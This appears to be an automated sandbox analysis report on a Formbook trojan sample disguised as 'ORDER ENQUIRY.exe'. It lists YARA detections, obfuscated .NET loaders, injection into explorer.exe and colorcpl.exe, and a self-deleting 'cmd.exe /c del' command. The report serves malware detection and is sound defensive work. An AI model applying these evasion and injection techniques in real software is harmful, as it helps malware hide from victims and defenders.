Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_04765B32	5_2_04765B32
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_04765B30	5_2_04765B30

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 0490EA12 appears 86 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 048D5130 appears 58 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 0491F290 appears 105 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 0488B970 appears 280 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 048E7E54 appears 102 times
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: String function: 01AAB970 appears 280 times
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: String function: 01B3F290 appears 105 times
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: String function: 01B07E54 appears 111 times
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: String function: 01B2EA12 appears 86 times
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: String function: 01AF5130 appears 58 times

Source: ORDER ENQUIRY.exe, 00000000.00000002.2096801847.000000000136E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs ORDER ENQUIRY.exe
Source: ORDER ENQUIRY.exe, 00000000.00000002.2100405437.000000000BA10000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs ORDER ENQUIRY.exe
Source: ORDER ENQUIRY.exe, 00000000.00000000.2086523619.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamegTwj.exe4 vs ORDER ENQUIRY.exe
Source: ORDER ENQUIRY.exe, 00000000.00000002.2098261483.00000000049FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs ORDER ENQUIRY.exe
Source: ORDER ENQUIRY.exe, 00000003.00000002.2158318122.0000000001983000.00000040.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenamecolorcpl.exej% vs ORDER ENQUIRY.exe
Source: ORDER ENQUIRY.exe, 00000003.00000002.2157829388.0000000001628000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamecolorcpl.exej% vs ORDER ENQUIRY.exe
Source: ORDER ENQUIRY.exe, 00000003.00000002.2158429548.0000000001BAD000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs ORDER ENQUIRY.exe
Source: ORDER ENQUIRY.exe, 00000003.00000002.2157829388.000000000164D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamecolorcpl.exej% vs ORDER ENQUIRY.exe
Source: ORDER ENQUIRY.exe	Binary or memory string: OriginalFilenamegTwj.exe4 vs ORDER ENQUIRY.exe

Source: ORDER ENQUIRY.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 3.2.ORDER ENQUIRY.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.ORDER ENQUIRY.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.ORDER ENQUIRY.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.ORDER ENQUIRY.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.ORDER ENQUIRY.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.ORDER ENQUIRY.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.4550866851.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.4550866851.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.4550866851.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.4564943648.00000000106AF000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
Source: 00000005.00000002.4550807070.0000000002B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.4550807070.0000000002B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.4550807070.0000000002B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.2098261483.00000000049FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.2098261483.00000000049FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.2098261483.00000000049FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: ORDER ENQUIRY.exe PID: 3032, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: ORDER ENQUIRY.exe PID: 4564, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: colorcpl.exe PID: 3944, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: ORDER ENQUIRY.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.ORDER ENQUIRY.exe.ba10000.4.raw.unpack, oHjiQZkJuabU3f09BG.cs	Security API names: _0020.SetAccessControl
Source: 0.2.ORDER ENQUIRY.exe.ba10000.4.raw.unpack, oHjiQZkJuabU3f09BG.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ORDER ENQUIRY.exe.ba10000.4.raw.unpack, oHjiQZkJuabU3f09BG.cs	Security API names: _0020.AddAccessRule
Source: 0.2.ORDER ENQUIRY.exe.4c3bda0.2.raw.unpack, oHjiQZkJuabU3f09BG.cs	Security API names: _0020.SetAccessControl
Source: 0.2.ORDER ENQUIRY.exe.4c3bda0.2.raw.unpack, oHjiQZkJuabU3f09BG.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ORDER ENQUIRY.exe.4c3bda0.2.raw.unpack, oHjiQZkJuabU3f09BG.cs	Security API names: _0020.AddAccessRule
Source: 0.2.ORDER ENQUIRY.exe.4c3bda0.2.raw.unpack, uyO80QM5DlYBNnlsDa.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ORDER ENQUIRY.exe.ba10000.4.raw.unpack, uyO80QM5DlYBNnlsDa.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.evad.winEXE@8/1@11/6

Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ORDER ENQUIRY.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6572:120:WilError_03

Source: ORDER ENQUIRY.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: ORDER ENQUIRY.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: ORDER ENQUIRY.exe	Virustotal: Detection: 50%
Source: ORDER ENQUIRY.exe	ReversingLabs: Detection: 57%

Source: unknown	Process created: C:\Users\user\Desktop\ORDER ENQUIRY.exe "C:\Users\user\Desktop\ORDER ENQUIRY.exe"
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Process created: C:\Users\user\Desktop\ORDER ENQUIRY.exe "C:\Users\user\Desktop\ORDER ENQUIRY.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\colorcpl.exe "C:\Windows\SysWOW64\colorcpl.exe"
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\ORDER ENQUIRY.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Process created: C:\Users\user\Desktop\ORDER ENQUIRY.exe "C:\Users\user\Desktop\ORDER ENQUIRY.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\colorcpl.exe "C:\Windows\SysWOW64\colorcpl.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\ORDER ENQUIRY.exe"	Jump to behavior

Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: workfoldersshell.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.schema.shell.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: colorui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: mscms.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: coloradapterclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: wininet.dll	Jump to behavior

Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: ORDER ENQUIRY.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: ORDER ENQUIRY.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: ORDER ENQUIRY.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: gTwj.pdb source: ORDER ENQUIRY.exe
Source:	Binary string: colorcpl.pdbGCTL source: ORDER ENQUIRY.exe, 00000003.00000002.2158318122.0000000001980000.00000040.10000000.00040000.00000000.sdmp, ORDER ENQUIRY.exe, 00000003.00000002.2157829388.0000000001628000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.4550455934.00000000000E0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: colorcpl.pdb source: ORDER ENQUIRY.exe, 00000003.00000002.2158318122.0000000001980000.00000040.10000000.00040000.00000000.sdmp, ORDER ENQUIRY.exe, 00000003.00000002.2157829388.0000000001628000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, colorcpl.exe, 00000005.00000002.4550455934.00000000000E0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: ORDER ENQUIRY.exe, 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.2156878359.000000000450B000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.4551625588.0000000004860000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.2164752594.00000000046B7000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.4551625588.00000000049FE000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: ORDER ENQUIRY.exe, ORDER ENQUIRY.exe, 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, colorcpl.exe, 00000005.00000003.2156878359.000000000450B000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.4551625588.0000000004860000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.2164752594.00000000046B7000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.4551625588.00000000049FE000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: gTwj.pdbSHA256 source: ORDER ENQUIRY.exe

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.ORDER ENQUIRY.exe.ba10000.4.raw.unpack, oHjiQZkJuabU3f09BG.cs	.Net Code: WbRNe2dWUs System.Reflection.Assembly.Load(byte[])
Source: 0.2.ORDER ENQUIRY.exe.7480000.3.raw.unpack, MainForm.cs	.Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.ORDER ENQUIRY.exe.4c3bda0.2.raw.unpack, oHjiQZkJuabU3f09BG.cs	.Net Code: WbRNe2dWUs System.Reflection.Assembly.Load(byte[])
Source: 0.2.ORDER ENQUIRY.exe.41ca230.1.raw.unpack, MainForm.cs	.Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.ORDER ENQUIRY.exe.41e2450.0.raw.unpack, MainForm.cs	.Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 0_2_015EE452 pushad ; iretd	0_2_015EE459
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 0_2_015EDAA2 pushad ; ret	0_2_015EDAA5
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_00417A63 push esi; iretd	3_2_00417A8C
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_00416A0C push cs; ret	3_2_00416A24
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_0040E2B5 push eax; retf	3_2_0040E2B6
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_0041D4F2 push eax; ret	3_2_0041D4F8
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_0041D4FB push eax; ret	3_2_0041D562
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_0041D4A5 push eax; ret	3_2_0041D4F8
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_0041D55C push eax; ret	3_2_0041D562
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AB09AD push ecx; mov dword ptr [esp], ecx	3_2_01AB09B6
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01A81368 push eax; iretd	3_2_01A81369
Source: C:\Windows\explorer.exe	Code function: 4_2_1069AB02 push esp; retn 0000h	4_2_1069AB03
Source: C:\Windows\explorer.exe	Code function: 4_2_1069AB1E push esp; retn 0000h	4_2_1069AB1F
Source: C:\Windows\explorer.exe	Code function: 4_2_1069A9B5 push esp; retn 0000h	4_2_1069AAE7
Source: C:\Windows\explorer.exe	Code function: 4_2_10D389B5 push esp; retn 0000h	4_2_10D38AE7
Source: C:\Windows\explorer.exe	Code function: 4_2_10D38B1E push esp; retn 0000h	4_2_10D38B1F
Source: C:\Windows\explorer.exe	Code function: 4_2_10D38B02 push esp; retn 0000h	4_2_10D38B03
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_000E1A6D push ecx; ret	5_2_000E1A80
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048909AD push ecx; mov dword ptr [esp], ecx	5_2_048909B6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_0287E2B5 push eax; retf	5_2_0287E2B6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_0288D4A5 push eax; ret	5_2_0288D4F8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_0288D4FB push eax; ret	5_2_0288D562
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_0288D4F2 push eax; ret	5_2_0288D4F8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_0288D55C push eax; ret	5_2_0288D562
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_02886A0C push cs; ret	5_2_02886A24
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_02887A63 push esi; iretd	5_2_02887A8C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_0476E9B5 push esp; retn 0000h	5_2_0476EAE7
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_0476EB1E push esp; retn 0000h	5_2_0476EB1F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_0476EB02 push esp; retn 0000h	5_2_0476EB03

Source: ORDER ENQUIRY.exe

Static PE information: section name: .text entropy: 7.71035451108767

Source: 0.2.ORDER ENQUIRY.exe.ba10000.4.raw.unpack, CTaj1jy4xgrGq5RHHk.cs	High entropy of concatenated method names: 'Dispose', 'hkd7jEFGad', 'UhOrCfWRYb', 'iod66TEudB', 'N6I74Twih3', 'KiT7zeMtdZ', 'ProcessDialogKey', 'q7vr8fCpBl', 'Tser7fWrUu', 'hk2rr9Z5JR'
Source: 0.2.ORDER ENQUIRY.exe.ba10000.4.raw.unpack, QyI0xEwmLs04ImZyI1.cs	High entropy of concatenated method names: 'tfP7YC3T4X', 'mBd71VjTL6', 'nVI7VH3Tyx', 'Nag753eS1Z', 'Yt97OJZC5K', 'z3s7J8MAIR', 'wRIcdFM1S92C9diWiK', 'jIpBU4NwZqdRHiZb5f', 'HVe77FltPm', 'CU37TRcJ7a'
